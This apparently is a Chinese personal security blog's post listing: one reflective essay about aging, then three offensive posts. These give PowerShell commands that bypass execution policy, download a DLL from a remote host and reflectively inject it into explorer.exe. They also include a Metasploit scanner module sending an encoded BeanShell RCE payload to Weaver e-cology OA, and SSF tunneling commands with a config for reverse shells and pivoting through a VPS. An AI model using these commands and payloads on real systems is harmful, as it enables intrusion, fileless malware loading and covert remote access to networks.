发表于 | 分类于

最近换了一份工作。也跟三十岁左右的男性打了一些交道,感受到岁月的残酷。

高铁上看着坐在我右边的某人头发上的白发;我以为某大佬三十多了(35以上)其实他才29;micro8在每篇文章中都说要多喝水,因为喝水喝少了,得了肾结石。

我们马上就要老了。

工作步入了正轨。

我已经完成了18岁的我的诺言,要成为一个会拉小提琴的黑客。

已经过去好多年了。大半夜的忽然有些感慨。原来我也是给能给新人指点迷津的老师傅了。

我能想到的是

  1. 均衡饮食
  2. 练出腹肌
  3. 不再熬夜通宵,保证睡眠
  4. 每天1.5L水
  5. 勤洗衣服换床单勤洗澡:P,不要再懒惰下去了。。
  6. 技术方面稳步提升就好,身体第一

虽然还是觉得人生没有意义,人生而孤独,但是还是要坚强。

也算是做出了当时觉得不重要,但是几十年以后发现其实至关重要的选择。

选择在哪里,遇到什么样的人,影响了你的未来,决定了你的一生。

很多事情,一旦做出选择,就无法回头了。

年轻的时候看了很多书,现在是去践行书中的道理的时候了。

b乎上有个问题很火,虽然知道了很多道理,但是依然过不好这一生。

其实知道道理容易,做起来难。

28岁是一个分水岭,年纪大了以后很多杂事随之而来。应该更珍惜现在的时间才是。

植物大战僵尸就不要再玩了吧,2333

阅读全文 »

发表于 | 分类于

dll注入和反射式dll注入的区别

合法进程 恶意dll

从本地或者dll调用

【生成恶意载荷,并执行web服务托管dll】

省略

【目标机器载入内存,使用反射式dll注入直接载入内存不落盘】

1
2
3
4
5
6
7
PowerShell -Exec Bypass

Import-Module C:\Users\whale\Desktop\Invoke-ReflectivePEInjection.ps1
$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.123.138/today.dll')
$procid = (Get-Process -Name explorer).Id

Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid

参考资料

  • https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
  • https://www.andreafortuna.org/2017/12/08/what-is-reflective-dll-injection-and-how-can-be-detected/
  • https://github.com/stephenfewer/ReflectiveDLLInjection
阅读全文 »

发表于 | 分类于

写一个泛微OA的scanner扫描模块

这是python3的模块,使用方法是放到kali对应目录下:/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python
# Copyright (c) 2003-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#

import requests
import metasploit.module as module

metadata = {
    'name': 'weaver e-cology oa system rce',
    'description': '''weaver e-cology oa system <=9.0 remote code execution''',
    'authors': ['whale3070'],
    'date': '2021-02-19',
    'license': 'CORE_LICENSE',
    'references': [
        {'type': 'url', 'ref': 'https://whale3070.github.io/'},
     ],
    'type': 'single_scanner',
    'options': {
        'RPORT': {'type': 'string', 'description': 'PORT', 'required': True}
    },
    'notes': {
        'AKA': ['weaver_e_cology_rce_scanner.py']
    }
}

def log(message, level='info'):
    print(
        r'''
                {
                    "jsonrpc": "2.0", "method": "message", "params":
                    {
                        "level": "%s",
                        "message": "%s"
                    }
                }
        ''' % (level, message)
    )

def single_url(rhost, rport):
    request_url = 'http://' + rhost + ":" + rport + "/weaver/bsh.servlet.BshServlet"
    vuln_url = request_url
    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Content-Type': "application/x-www-form-urlencoded",
        'Content-Length': "43",
        'Referer': "%s" % vuln_url,
        'Connection': "close"
    }
    payload = r'''bsh.script=print(Interpreter.VERSION);%53%74%72%69%6e%67%20%4f%53%20%3d%20%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70%65%72%74%69%65%73%28%29%2e%67%65%74%50%72%6f%70%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%3b%0d%0a%70%72%69%6e%74%28%4f%53%29%3bpwd()'''
    try:
        r = requests.post(url=vuln_url, data=payload, headers=headers, timeout=5)
        if r.status_code == 200 and r'getProperty' in r.content:
            log("Found weaver e-cology RCE in " + vuln_url, 'good')
        else:
            log("Not found weaver e-cology RCE in " + vuln_url, 'warning')
    except requests.exceptions.RequestException as e:
        log("Not found weaver e-cology RCE in " + vuln_url, 'warning')

def run(args):
    # formatted_args = {}
    # for key, value in args.items():
    #     formatted_args[str.upper(key)] = value
    # log(str(formatted_args), 'good')
    rhost = args['rhost']
    rport = args['RPORT']
    single_url(rhost, rport)

if __name__ == "__main__":
    module.run(metadata, run)
阅读全文 »

发表于 | 分类于

正向动态转发(要访问的是ssfd服务端的网络)

当我们要去连接内网的时候,可以直接访问到

ssf服务端设置(访问这个网络)

1
2
3
4
5
6
./ssfd -p 1080
python -m SimpleHTTPServer 8000
wget -r http://192.168.28.148:8000/ssf

ssf客户端设置:
./ssf -D 1089 -p 8080 VPS-IP

反向动态转发(要访问的是ssf客户端的网络)

当我们要连接内网,但是无法直接访问内网机器。如果内网机器可以出网,那么就可以让内网机器来连我们。

1
2
3
4
5
6
vps上设置监听:
./ssfd -p 8080

内网机器来主动连接我们:
./ssf -F 1089 -p 8080 VPS-IP
./ssf -F 1089 -p 8080 18.167.19.3

案例一:访问谷歌

1
2
3
4
vps设置:./ssfd -p 8080
攻击机器设置:./exim -D 1089 -p 1080 18.167.19.3
proxychains firefox 
./ssf -D 1089 -p 8080 18.167.19.3

案例二:弹shell

反向shell

1
2
3
4
5
6
7
【vps设置】
./ssfd -p 8080 -c config.json /b

【目标机器】
./ssf -Y shell要接收的端口 VPS -c config.json -p VPS监听的端口

./ssf -Y 8888 45.62.123.226 -c config.json -p 8080

nc 127.0.0.1 8888

config.json参考配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
{
  "ssf": {
    "arguments": "",
    "circuit": [],
    "tls" : {
      "ca_cert_path": "./certs/trusted/ca.crt",
      "cert_path": "./certs/certificate.crt",
      "key_path": "./certs/private.key",
      "key_password": "",
      "dh_path": "./certs/dh4096.pem",
      "cipher_alg": "DHE-RSA-AES256-GCM-SHA384"
    },
    "http_proxy" : {
      "host": "",
      "port": "",
      "user_agent": "",
      "credentials": {
        "username": "",
        "password": "",
        "domain": "",
        "reuse_ntlm": "true",
        "reuse_nego": "true"
      }
    },
    "services": {
      "datagram_forwarder": { "enable": true },
      "datagram_listener": {
        "enable": true,
		"shell": { "enable": false },
        "gateway_ports": false
      },
      "stream_forwarder": { "enable": true },
      "stream_listener": {
        "enable": true,
        "gateway_ports": false
      },
      "copy": { "enable": false },
      "shell": {
        "enable": true,
        "path": "/bin/bash",
        "args": ""
      },
      "socks": { "enable": true }
    }
  }
}
阅读全文 »